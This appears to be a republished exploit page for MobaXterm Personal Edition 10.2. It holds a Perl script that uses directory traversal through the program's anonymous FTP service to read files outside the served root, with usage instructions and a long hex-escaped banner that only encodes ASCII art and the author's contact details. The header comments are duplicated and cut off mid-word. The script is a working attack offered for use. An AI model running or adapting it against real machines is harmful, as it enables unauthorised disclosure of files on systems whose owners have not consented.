MobaXterm Personal Edition 10.2 Directory Traversal

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 723

#!/usr/bin/perl
# Exploit Title: [ MobaXterm Personal Edition * / 10.2 FTP File Disclosure]
# -> allow users to browse outside root directory
# -> allow anonymous conn #!/usr/bin/perl
# Exploit Title: [ MobaXterm Personal Edition * / 10.2 FTP File Disclosure]
# -> allow users to browse outside root directory
# -> allow anonymous connections
# -> without username and password
# The solution is not to allow users to browse outside root directory and anonymous connections
# Exploit Author: [(sultan albalawi)]
# Software Link: [http://download.mobatek.net/10220170312132617/MobaXterm_Portable_v10.2.zip]
# Version: [*]
# Tested on: [win 7 and 10]
# video :https://www.facebook.com/pentest3/videos/vb.100012552940568/297050184056744/?type=2&theater&notif_t=video_processed&notif_id=1494013373595156

use LWP::Simple;
use LWP::UserAgent;
$ban= ("x0dx0ax20x20x20x20x20x20x20x5cx20x20x20x2dx20x20".
"x2dx20x20x2dx20x3cx73x65x72x76x65x72x3ex20x20x2d".
"x20x5cx2dx2dx2dx3cx20x2dx20x2dx20x20x2dx20x2dx20".
"x20x2dx20x20x2ax0dx0ax20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x2ax2ax2ax0dx0ax20x20x20".
"x20x20x20x20x7cx20x20x20x20x44x6fx63x5fx41x74x74".
"x61x63x6bx20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x2ax2ax2a".
"x2ax2ax0dx0ax20x20x20x20x20x20x20x7cx20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x2ax2ax2ax2ax2ax2ax2ax0dx0ax20x20x20x20".
"x20x20x20x76x20x20x20x20x20x20x20x20x60x20x60x2e".
"x20x20x20x20x2cx3bx27x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x2ax2ax2ax2ax41x70x50".
"x2ax2ax2ax2ax0dx0ax20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x60x2ex20x20x2cx27x2fx20x2ex27".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax0d".
"x0ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x60x2ex20x58x20x2fx2ex27x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x2ax20x20x20x20x20x2ax2ax2a".
"x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax0dx0ax20x20x20x20".
"x20x20x20x2ex2dx3bx2dx2dx27x27x2dx2dx2ex5fx60x20".
"x60x20x28x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x2ax2ax2ax20x20x20x20x20x20x20x20x20x20x7cx0d".
"x0ax20x20x20x20x20x2ex27x20x20x20x20x20x20x20x20".
"x20x20x20x2fx20x20x20x20x27x20x20x20x20x20x20x20".
"x20x20x20x20x20x2ax2ax2ax2ax2ax20x20x20x20x20x20".
"x20x20x20x7cx20x64x61x74x61x62x61x73x65x0dx0ax20".
"x20x20x20x20x3bx53x65x63x75x72x69x74x79x60x20x20".
"x27x20x30x20x20x30x20x27x20x20x20x20x20x20x20x20".
"x20x2ax2ax2ax4ex45x54x2ax2ax2ax20x20x20x20x20x20".
"x20x7cx0dx0ax20x20x20x20x2cx20x20x20x20x20x20x20".
"x2cx20x20x20x20x27x20x20x7cx20x20x27x20x20x20x20".
"x20x20x20x20x20x20x2ax2ax2ax2ax2ax2ax2ax2ax2ax20".
"x20x20x20x20x20x20x5ex0dx0ax20x2cx2ex20x7cx20x20".
"x20x20x20x20x20x27x20x20x20x20x20x60x2ex5fx2ex27".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x7c".
"x2dx2dx2dx2dx2dx2dx2dx5ex2dx2dx2dx5ex20x20x20x20".
"x20x20x20x20x20x20x2fx0dx0ax20x3ax20x20x2ex20x60".
"x20x20x3bx20x20x20x60x20x20x60x20x2dx2dx2cx2ex2e".
"x5fx3bx2dx2dx2dx3ex20x20x20x20x20x20x20x20x20x7c".
"x20x20x20x20x20x20x20x27x2ex27x2ex27x5fx5fx5fx5f".
"x5fx5fx5fx5fx20x2ax0dx0ax20x20x27x20x60x20x20x20".
"x20x2cx20x20x20x29x20x20x20x2ex27x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x5ex20".
"x20x20x20x20x20x20x20x7cx5fx7cx20x46x69x72x65x77".
"x61x6cx6cx20x29x0dx0ax20x20x20x20x20x60x2ex5fx20".
"x2cx20x20x27x20x20x20x2fx5fx20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x7cx20x20".
"x20x20x20x20x20x20x20x20x20x20x7cx7cx20x20x20x20".
"x7cx7cx0dx0ax20x20x20x20x20x20x20x20x3bx20x2cx27".
"x27x2dx2cx3bx27x20x60x60x2dx5fx5fx5fx5fx5fx5fx5f".
"x5fx5fx5fx5fx5fx5fx5fx5fx5fx5fx7cx0dx0ax20x20x20".
"x20x20x20x20x20x20x60x60x2dx2ex2ex5fx5fx60x60x2d".
"x2dx60x20x20x20x20x20x20x20x69x70x73x20x20x20x20".
"x20x20x20x2dx20x20x20x20x20x20x20x20x20x20x20x5e".
"x20x20x20x20x20x20x20x20x20x20x20x20x2fx0dx0ax20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x2dx20x20x20x20x20x20x20x20x27".
"x2ex20x5fx2dx2dx2dx2dx2dx2dx2dx2dx2dx2ax0dx0ax20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x2dx5fx5fx5fx5fx5fx5fx5fx20".
"x7cx5fx20x20x49x50x53x20x20x20x20x20x29x0dx0ax20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x7cx7cx20x20x20x20x20x7cx7cx0dx0ax20".
" ".
"x53x75x6cx74x61x6ex5fx41x6cx62x61x6cx61x77x69 ".
"x68x74x74x70x73x3ax2fx2fx77x77x77x2ex66x61x63x65x62x6fx6fx6bx2ex63x6fx6dx2fx70x65x6ex74x65x73x74x33 ".
"x61x6cx62x61x6cx61x77x69x34x70x65x6ex74x65x73x74x40x67x6dx61x69x6cx2ex63x6fx6d");

print($ban);
print(" ");
print(" ");
if (@ARGV < 3) {
print("Usage: $0 <url> <port> <../../../../filename> or ../../../../ ");
print(" perl $0 0.0.0.0 21 ../../../../filename ");
exit(1);
}
($target, $port,$filename) = @ARGV;
$_s="/" x 5;
my $url= "ftp://". $target. ":" . $port .$_s . $filename;
$content=get $url;
print("$content");
print(" ........ ");